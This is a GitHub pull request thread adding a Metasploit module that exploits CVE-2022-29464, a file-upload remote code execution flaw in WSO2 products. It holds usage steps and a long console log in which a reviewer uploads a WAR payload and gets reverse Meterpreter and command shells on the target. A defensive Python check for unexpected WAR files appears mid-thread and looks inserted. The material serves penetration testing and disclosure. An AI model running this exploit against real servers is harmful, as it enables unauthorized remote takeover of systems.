Add WSO2 file upload RCE module #16507

Merged (12 commits) Apr 29, 2022

Conversation

jheysel-r7
Contributor

@jheysel-r7 jheysel-r7 commented Apr 26, 2022

Multiple WSO2 products are vulnerable to an unrestricted file upload vulnerability that results in RCE. This module builds a java/meterpreter/reverse_tcp payload inside a war file and uploads it to the target via the vulnerable file upload. It then executes the payload and receives a shell.

Verification

List the steps needed to make sure this thing works

  • Install the application
  • Start msfconsole
  • Do: use multi/http/wso2_file_upload_rce
  • Do: set rhosts [ip]
  • Do: set lhost [ip]
  • Do: run
  • You should get a shell.
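From the defender's side, the description above (an attacker-supplied WAR being dropped into the server's deployment directory) is what a host-based check can catch. The following is an added example, not code from this pull request or from the Metasploit project: it snapshots the SHA-256 of every deployed `.war` from a known-good install and later reports any WAR that is new or whose contents changed. The deployment directory is a constructed temporary directory here; on a real host you would point it at the WSO2 product's webapp deployment path (a placeholder, since the thread does not name it).

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Hash a file in chunks so large WARs do not have to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot_wars(deploy_dir: Path) -> dict:
    """Map each deployed .war (searched recursively) to its SHA-256."""
    return {str(p.relative_to(deploy_dir)): sha256_file(p)
            for p in sorted(deploy_dir.rglob("*.war"))}


def find_unexpected_wars(deploy_dir: Path, baseline: dict) -> dict:
    """Compare the live deployment directory against an approved baseline.

    Returns {relative_path: "new" | "modified"}; an empty dict means clean.
    """
    findings = {}
    for name, digest in snapshot_wars(deploy_dir).items():
        if name not in baseline:
            findings[name] = "new"          # WAR nobody approved: e.g. a dropped payload
        elif baseline[name] != digest:
            findings[name] = "modified"     # approved WAR replaced or tampered with
    return findings


def demo() -> dict:
    # Constructed sample: a temp dir stands in for the WSO2 webapp deploy directory
    # (placeholder; substitute the real path on a production host).
    with tempfile.TemporaryDirectory() as tmp:
        deploy = Path(tmp)
        (deploy / "approved.war").write_bytes(b"PK\x03\x04approved")
        baseline = snapshot_wars(deploy)  # taken from the known-good install
        # Later: an unapproved WAR shows up and the approved one is altered.
        (deploy / "dropped.war").write_bytes(b"PK\x03\x04payload")
        (deploy / "approved.war").write_bytes(b"PK\x03\x04tampered")
        return find_unexpected_wars(deploy, baseline)


if __name__ == "__main__":
    print(demo())  # {'approved.war': 'modified', 'dropped.war': 'new'}
```

Run the snapshot once on a freshly installed, patched system and store it read-only off-host; re-running the comparison on a schedule (or from a file-change watcher) gives an alert within the same window the module waits for the WAR to deploy.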

@wvu
Contributor

wvu commented Apr 26, 2022

Hi, Jack!

@jheysel-r7
Contributor Author

Hi, Jack!

WILL!! Great to hear from you, I knew it wasn't bye forever 🎉

@smcintyre-r7 smcintyre-r7 self-assigned this Apr 28, 2022
@smcintyre-r7 smcintyre-r7 added the rn-modules release notes for new or majorly enhanced modules label Apr 28, 2022
@smcintyre-r7
Contributor

@msjenkins-r7 test this please.


@smcintyre-r7 smcintyre-r7 left a comment


Module is working great! The check method looks a lot better now and the exponential backoff means I'm getting my shells a lot faster. I tested both a Java Meterpreter and Java Shell payload. Everything worked perfectly. I'll get this landed in a moment.

Testing Output
msf6 exploit(multi/http/wso2_file_upload_rce) > show options 

Module options (exploit/multi/http/wso2_file_upload_rce):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             9443             yes       The target port (TCP)
   SSL               true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI         /                yes       Relative URI of WSO2 product installation
   VHOST                              no        HTTP server virtual host
   WAR_DEPLOY_DELAY  20               yes       How long to wait for the war file to deploy, in seconds


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Dropper


msf6 exploit(multi/http/wso2_file_upload_rce) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 exploit(multi/http/wso2_file_upload_rce) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(multi/http/wso2_file_upload_rce) > check
[*] 192.168.159.128:9443 - The target appears to be vulnerable.
msf6 exploit(multi/http/wso2_file_upload_rce) > edit
msf6 exploit(multi/http/wso2_file_upload_rce) > exploit
msf6 exploit(multi/http/wso2_file_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Preparing payload...
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload... 
[*] Waiting for shell... 
[*] Waiting for shell... 
[*] Waiting for shell... 
[*] Waiting for shell... 
[+] Payload executed successfully
[*] Sending stage (58851 bytes) to 192.168.159.128
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.128:60720 ) at 2022-04-29 09:55:35 -0400

meterpreter > getuid
Server username: smcintyre
meterpreter > sysinfo
Computer        : localhost.localdomain
OS              : Linux 5.17.4-100.fc34.x86_64 (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.128 - Meterpreter session 1 closed.  Reason: User exit
[*] 192.168.159.128 - Meterpreter session 1 closed.  Reason: Died
msf6 exploit(multi/http/wso2_file_upload_rce) > set PAYLOAD java/
set PAYLOAD java/jsp_shell_bind_tcp         set PAYLOAD java/meterpreter/bind_tcp       set PAYLOAD java/meterpreter/reverse_https  set PAYLOAD java/shell/bind_tcp             set PAYLOAD java/shell_reverse_tcp
set PAYLOAD java/jsp_shell_reverse_tcp      set PAYLOAD java/meterpreter/reverse_http   set PAYLOAD java/meterpreter/reverse_tcp    set PAYLOAD java/shell/reverse_tcp          
msf6 exploit(multi/http/wso2_file_upload_rce) > set PAYLOAD java/shell/reverse_tcp 
PAYLOAD => java/shell/reverse_tcp
msf6 exploit(multi/http/wso2_file_upload_rce) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Preparing payload...
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload... 
[*] Waiting for shell... 
[*] Waiting for shell... 
[+] Payload executed successfully
[*] Sending stage (2952 bytes) to 192.168.159.128
[*] Command shell session 2 opened (192.168.159.128:4444 -> 192.168.159.128:60722 ) at 2022-04-29 09:56:25 -0400

id
uid=1000(smcintyre) gid=1000(smcintyre) groups=1000(smcintyre),10(wheel),973(docker),975(wireshark)
pwd
/home/smcintyre/Downloads/wso2am-4.0.0
exit
[*] 192.168.159.128 - Command shell session 2 closed.
msf6 exploit(multi/http/wso2_file_upload_rce) >

@smcintyre-r7 smcintyre-r7 merged commit c994f8e into rapid7:master Apr 29, 2022
@smcintyre-r7
Contributor

Release Notes

This adds an exploit for CVE-2022-29464 which is an arbitrary file upload vulnerability in multiple WSO2 products that can be used to obtain remote code execution.
